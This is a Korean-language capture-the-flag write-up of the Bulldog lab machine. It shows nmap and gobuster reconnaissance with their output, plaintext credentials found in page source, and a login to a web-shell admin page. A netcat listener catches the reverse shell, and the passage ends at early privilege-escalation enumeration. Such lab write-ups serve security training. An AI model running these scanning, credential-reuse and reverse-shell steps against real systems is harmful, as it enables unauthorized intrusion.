Bulldog CTF 해킹 과정 분석

네트워크 탐색 및 호스트 감지

초기 단계에서 네트워크 내 활성화된 시스템을 식별하기 위해 다음과 같은 명령어를 사용했다.

sudo nmap -sn 192.168.122.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:45 EST
Nmap scan report for 192.168.122.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.122.2
Host is up (0.000099s latency).
MAC Address: 00:50:56:FE:B5:1F (VMware)
Nmap scan report for 192.168.122.141
Host is up (0.00015s latency).
MAC Address: 00:0C:29:FC:BE:B4 (VMware)
Nmap scan report for 192.168.122.254
Host is up (0.000091s latency).
MAC Address: 00:50:56:E9:8C:A1 (VMware)
Nmap scan report for 192.168.122.139
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.02 seconds

포트 스캔 수행

감지된 호스트에 대해 포트 오픈 상태를 확인하기 위해 전체 포트 범위를 검사했다.

sudo nmap --min-rate 10000 -p- 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:46 EST
Nmap scan report for 192.168.122.141
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 00:0C:29:FC:BE:B4 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds

상세 서비스 분석

오픈된 포트들에 대해 상세한 서비스 정보를 수집하고 운영체제 추정을 수행했다.

sudo nmap -sT -sV -sC -O -p23,80,8080 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:46 EST
Nmap scan report for 192.168.122.141
Host is up (0.00040s latency).
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
|_http-server-header: WSGIServer/0.1 Python/2.7.12
MAC Address: 00:0C:29:FC:BE:B4 (VMware)

UDP 취약점 스캔

TCP 외 UDP 프로토콜의 취약한 포트들을 확인하기 위한 검사다.

sudo nmap -sU --top-ports 20 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:47 EST
Nmap scan report for 192.168.122.141
Host is up (0.00082s latency).
PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:FC:BE:B4 (VMware)

HTTP 서비스 분석

웹 서버에 대한 취약점 조사를 수행하여 잠재적인 공격 경로를 식별한다.

sudo nmap --script=vuln -p23,80,8080 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:48 EST
Nmap scan report for 192.168.122.141
Host is up (0.00034s latency).
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
|http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|      http://ha.ckers.org/slowloris/
|http-csrf: Couldn't find any CSRF vulnerabilities.
|http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-fileupload-exploiter:
|     Couldn't find a file-type field.
|    Couldn't find a file-type field.
| http-enum:
|   /robots.txt: Robots file
|  /dev/: Potentially interesting folder
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file

디렉터리 열거

Gobuster 도구를 활용해 숨겨진 웹 디렉터리를 찾아내는 작업을 수행한다.

sudo gobuster dir -u http://192.168.122.141 -x txt,php,rar,zip,tar,sql -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.122.141
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,rar,zip,tar,sql
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> http://192.168.122.141/admin/]
/dev                  (Status: 301) [Size: 0] [--> http://192.168.122.141/dev/]
/robots.txt           (Status: 200) [Size: 1071]

웹 애플리케이션 탐색

/robots.txt 파일과 /admin, /dev 디렉터리를 조사하여 추가 정보를 수집한다.

인증 정보 획득

웹 소스 코드 분석을 통해 다음의 사용자 계정 정보를 발견한다.

nick:bulldog
sarah:bulldoglover

백도어 접근

발견된 인증 정보를 사용해 백도어 관리자 페이지에 로그인하여 웹 셸(Webshell)을 찾는다.

역방향 쉘 연결

Netcat을 사용하여 역방향 쉘을 확보하고 시스템에 접근한다.

sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.122.139] from (UNKNOWN) [192.168.122.141] 44294
bash: cannot set terminal process group (993): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$

시스템 정보 수집

권한 상승을 위한 시스템 정보를 수집한다.

django@bulldog:/home/django/bulldog$ whoami
whoami
django
django@bulldog:/home/django/bulldog$ uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
django@bulldog:/home/django/bulldog$ ip a
ip a
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33:  mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:fc:be:b4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.141/24 brd 192.168.122.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fefc:beb4/64 scope link 
       valid_lft forever preferred_lft forever

권한 상승 준비

현재 사용자 권한과 시스템 구성을 확인한다.

django@bulldog:/home/django/bulldog$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
django@bulldog:/home/django/bulldog$ cd /home
cd /home
django@bulldog:/home$ ls
ls
bulldogadmin

태그: Nmap web-security penetration-testing CTF reverse-shell

10월 11일 20:31에 게시됨